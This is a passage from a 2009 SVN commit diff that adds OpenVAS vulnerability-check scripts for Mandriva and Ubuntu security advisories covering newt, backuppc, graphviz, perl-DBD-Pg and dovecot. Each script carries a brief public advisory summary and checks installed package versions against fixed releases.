+ +Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0, + Enterprise Server 5.0, Multi Network Firewall 2.0 + + +Solution: +To upgrade automatically use MandrakeUpdate or urpmi. The verification +of md5 checksums and GPG signatures is performed automatically for you. + +https://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:249 + +Risk factor : High"; + + script_description(desc); + + script_summary("Mandrake Security Advisory MDVSA-2009:249 (newt)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Mandrake Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"libnewt0.52", rpm:"libnewt0.52~0.52.6~4.1mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.52-devel", rpm:"libnewt0.52-devel~0.52.6~4.1mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"newt", rpm:"newt~0.52.6~4.1mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52", rpm:"lib64newt0.52~0.52.6~4.1mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52-devel", rpm:"lib64newt0.52-devel~0.52.6~4.1mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.52", rpm:"libnewt0.52~0.52.6~5.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.52-devel", rpm:"libnewt0.52-devel~0.52.6~5.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"newt", rpm:"newt~0.52.6~5.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52", rpm:"lib64newt0.52~0.52.6~5.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52-devel", rpm:"lib64newt0.52-devel~0.52.6~5.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} 
+if(isrpmvuln(pkg:"libnewt0.52", rpm:"libnewt0.52~0.52.6~8.1mdv2009.1", rls:"MNDK_2009.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.52-devel", rpm:"libnewt0.52-devel~0.52.6~8.1mdv2009.1", rls:"MNDK_2009.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"newt", rpm:"newt~0.52.6~8.1mdv2009.1", rls:"MNDK_2009.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52", rpm:"lib64newt0.52~0.52.6~8.1mdv2009.1", rls:"MNDK_2009.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52-devel", rpm:"lib64newt0.52-devel~0.52.6~8.1mdv2009.1", rls:"MNDK_2009.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.51", rpm:"libnewt0.51~0.51.6~7.1.C30mdk", rls:"MNDK_3.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.51-devel", rpm:"libnewt0.51-devel~0.51.6~7.1.C30mdk", rls:"MNDK_3.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"newt", rpm:"newt~0.51.6~7.1.C30mdk", rls:"MNDK_3.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.51", rpm:"lib64newt0.51~0.51.6~7.1.C30mdk", rls:"MNDK_3.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.51-devel", rpm:"lib64newt0.51-devel~0.51.6~7.1.C30mdk", rls:"MNDK_3.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.51", rpm:"libnewt0.51~0.51.6~11.1.20060mlcs4", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.51-devel", rpm:"libnewt0.51-devel~0.51.6~11.1.20060mlcs4", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"newt", rpm:"newt~0.51.6~11.1.20060mlcs4", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.51", rpm:"lib64newt0.51~0.51.6~11.1.20060mlcs4", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.51-devel", rpm:"lib64newt0.51-devel~0.51.6~11.1.20060mlcs4", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.52", rpm:"libnewt0.52~0.52.6~5.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.52-devel", rpm:"libnewt0.52-devel~0.52.6~5.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"newt", rpm:"newt~0.52.6~5.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} 
+if(isrpmvuln(pkg:"lib64newt0.52", rpm:"lib64newt0.52~0.52.6~5.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52-devel", rpm:"lib64newt0.52-devel~0.52.6~5.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.51", rpm:"libnewt0.51~0.51.6~7.1.C30mdk", rls:"MNDK_2.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.51-devel", rpm:"libnewt0.51-devel~0.51.6~7.1.C30mdk", rls:"MNDK_2.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"newt", rpm:"newt~0.51.6~7.1.C30mdk", rls:"MNDK_2.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/mdksa_2009_253.nasl =================================================================== --- trunk/openvas-plugins/scripts/mdksa_2009_253.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/mdksa_2009_253.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,85 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory MDVSA-2009:253 (backuppc) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64996); + script_cve_id("CVE-2009-3369"); + script_version ("$"); + script_name("Mandrake Security Advisory MDVSA-2009:253 (backuppc)"); + + desc = " +The remote host is missing an update to backuppc +announced via advisory MDVSA-2009:253. + +A vulnerability was discovered and corrected in backuppc: + +CgiUserConfigEdit in BackupPC 3.1.0, when SSH keys and Rsync are in +use in a multi-user environment, does not restrict users from the +ClientNameAlias function, which allows remote authenticated users to +read and write sensitive files by modifying ClientNameAlias to match +another system, then initiating a backup or restore (CVE-2009-3369). + +This update provides a fix for this vulnerability. + +Affected: Enterprise Server 5.0 + +Solution: +To upgrade automatically use MandrakeUpdate or urpmi. 
The verification +of md5 checksums and GPG signatures is performed automatically for you. + +https://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:253 + +Risk factor : High"; + + script_description(desc); + + script_summary("Mandrake Security Advisory MDVSA-2009:253 (backuppc)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Mandrake Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"backuppc", rpm:"backuppc~3.1.0~7.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/mdksa_2009_254.nasl =================================================================== --- trunk/openvas-plugins/scripts/mdksa_2009_254.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/mdksa_2009_254.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,325 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory MDVSA-2009:254 (graphviz) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64997); + script_cve_id("CVE-2008-4555"); + script_version ("$"); + script_name("Mandrake Security Advisory MDVSA-2009:254 (graphviz)"); + + desc = " +The remote host is missing an update to graphviz +announced via advisory MDVSA-2009:254. + +A vulnerability was discovered and corrected in graphviz: + +Stack-based buffer overflow in the push_subg function in parser.y +(lib/graph/parser.c) in Graphviz 2.20.2, and possibly earlier versions, +allows user-assisted remote attackers to cause a denial of service +(memory corruption) or execute arbitrary code via a DOT file with a +large number of Agraph_t elements (CVE-2008-4555). + +This update provides a fix for this vulnerability. + +Affected: 2008.1, 2009.0, Corporate 4.0, Enterprise Server 5.0 + +Solution: +To upgrade automatically use MandrakeUpdate or urpmi. 
The verification +of md5 checksums and GPG signatures is performed automatically for you. + +https://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:254 + +Risk factor : High"; + + script_description(desc); + + script_summary("Mandrake Security Advisory MDVSA-2009:254 (graphviz)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Mandrake Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"graphviz", rpm:"graphviz~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"graphviz-doc", rpm:"graphviz-doc~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz4", rpm:"libgraphviz4~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz-devel", rpm:"libgraphviz-devel~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizlua0", rpm:"libgraphvizlua0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizocaml0", rpm:"libgraphvizocaml0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizperl0", rpm:"libgraphvizperl0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizphp0", rpm:"libgraphvizphp0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizpython0", rpm:"libgraphvizpython0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizr0", rpm:"libgraphvizr0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizruby0", rpm:"libgraphvizruby0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} 
+if(isrpmvuln(pkg:"libgraphviz-static-devel", rpm:"libgraphviz-static-devel~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviztcl0", rpm:"libgraphviztcl0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz4", rpm:"lib64graphviz4~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz-devel", rpm:"lib64graphviz-devel~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizlua0", rpm:"lib64graphvizlua0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizocaml0", rpm:"lib64graphvizocaml0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizperl0", rpm:"lib64graphvizperl0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizphp0", rpm:"lib64graphvizphp0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizpython0", rpm:"lib64graphvizpython0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizr0", rpm:"lib64graphvizr0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizruby0", rpm:"lib64graphvizruby0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz-static-devel", rpm:"lib64graphviz-static-devel~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviztcl0", rpm:"lib64graphviztcl0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"graphviz", rpm:"graphviz~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"graphviz-doc", rpm:"graphviz-doc~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz4", rpm:"libgraphviz4~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz-devel", 
rpm:"libgraphviz-devel~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizlua0", rpm:"libgraphvizlua0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizocaml0", rpm:"libgraphvizocaml0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizperl0", rpm:"libgraphvizperl0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizphp0", rpm:"libgraphvizphp0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizpython0", rpm:"libgraphvizpython0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizr0", rpm:"libgraphvizr0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizruby0", rpm:"libgraphvizruby0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz-static-devel", rpm:"libgraphviz-static-devel~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviztcl0", rpm:"libgraphviztcl0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz4", rpm:"lib64graphviz4~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz-devel", rpm:"lib64graphviz-devel~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizlua0", rpm:"lib64graphvizlua0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizocaml0", rpm:"lib64graphvizocaml0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizperl0", rpm:"lib64graphvizperl0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizphp0", rpm:"lib64graphvizphp0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizpython0", rpm:"lib64graphvizpython0~2.20.2~3.1mdv2009.0", 
rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizr0", rpm:"lib64graphvizr0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizruby0", rpm:"lib64graphvizruby0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz-static-devel", rpm:"lib64graphviz-static-devel~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviztcl0", rpm:"lib64graphviztcl0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"graphviz", rpm:"graphviz~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz7", rpm:"libgraphviz7~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz7-devel", rpm:"libgraphviz7-devel~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviztcl7", rpm:"libgraphviztcl7~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviztcl7-devel", rpm:"libgraphviztcl7-devel~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz7", rpm:"lib64graphviz7~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz7-devel", rpm:"lib64graphviz7-devel~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviztcl7", rpm:"lib64graphviztcl7~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviztcl7-devel", rpm:"lib64graphviztcl7-devel~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"graphviz", rpm:"graphviz~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"graphviz-doc", rpm:"graphviz-doc~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz4", rpm:"libgraphviz4~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz-devel", rpm:"libgraphviz-devel~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + 
vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizlua0", rpm:"libgraphvizlua0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizocaml0", rpm:"libgraphvizocaml0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizperl0", rpm:"libgraphvizperl0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizphp0", rpm:"libgraphvizphp0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizpython0", rpm:"libgraphvizpython0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizr0", rpm:"libgraphvizr0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizruby0", rpm:"libgraphvizruby0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz-static-devel", rpm:"libgraphviz-static-devel~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviztcl0", rpm:"libgraphviztcl0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz4", rpm:"lib64graphviz4~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz-devel", rpm:"lib64graphviz-devel~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizlua0", rpm:"lib64graphvizlua0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizocaml0", rpm:"lib64graphvizocaml0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizperl0", rpm:"lib64graphvizperl0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizphp0", rpm:"lib64graphvizphp0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizpython0", rpm:"lib64graphvizpython0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizr0", rpm:"lib64graphvizr0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} 
+if(isrpmvuln(pkg:"lib64graphvizruby0", rpm:"lib64graphvizruby0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz-static-devel", rpm:"lib64graphviz-static-devel~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviztcl0", rpm:"lib64graphviztcl0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/mdksa_2009_255.nasl =================================================================== --- trunk/openvas-plugins/scripts/mdksa_2009_255.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/mdksa_2009_255.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,84 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory MDVSA-2009:255 (perl-DBD-Pg) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64998); + script_cve_id("CVE-2009-0663"); + script_version ("$"); + script_name("Mandrake Security Advisory MDVSA-2009:255 (perl-DBD-Pg)"); + + desc = " +The remote host is missing an update to perl-DBD-Pg +announced via advisory MDVSA-2009:255. + +A vulnerability was discovered and corrected in perl-DBD-Pg: + +Heap-based buffer overflow in the DBD::Pg module for Perl might allow +context-dependent attackers to execute arbitrary code via unspecified +input to an application that uses the getline and pg_getline functions +to read database rows. + +This update provides a fix for this vulnerability. + +Affected: Corporate 4.0 + +Solution: +To upgrade automatically use MandrakeUpdate or urpmi. The verification +of md5 checksums and GPG signatures is performed automatically for you. 
+ +https://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:255 + +Risk factor : High"; + + script_description(desc); + + script_summary("Mandrake Security Advisory MDVSA-2009:255 (perl-DBD-Pg)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Mandrake Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"perl-DBD-Pg", rpm:"perl-DBD-Pg~1.43~2.1.20060mlcs4", rls:"MNDK_4.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/ubuntu_838_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/ubuntu_838_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/ubuntu_838_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,138 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory USN-838-1 (dovecot) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65010); + script_cve_id("CVE-2008-4577", "CVE-2008-5301", "CVE-2009-2632", "CVE-2009-3235"); + script_version ("$"); + script_name("Ubuntu USN-838-1 (dovecot)"); + + desc = " +The remote host is missing an update to dovecot +announced via advisory USN-838-1. + +Details follow: + +It was discovered that the ACL plugin in Dovecot would incorrectly handle +negative access rights. An attacker could exploit this flaw to access the +Dovecot server, bypassing the indended access restrictions. This only +affected Ubuntu 8.04 LTS. (CVE-2008-4577) + +It was discovered that the ManageSieve service in Dovecot incorrectly +handled .. in script names. A remote attacker could exploit this to read +and modify arbitrary sieve files on the server. This only affected Ubuntu +8.10. (CVE-2008-5301) + +It was discovered that the Sieve plugin in Dovecot incorrectly handled +certain sieve scripts. 
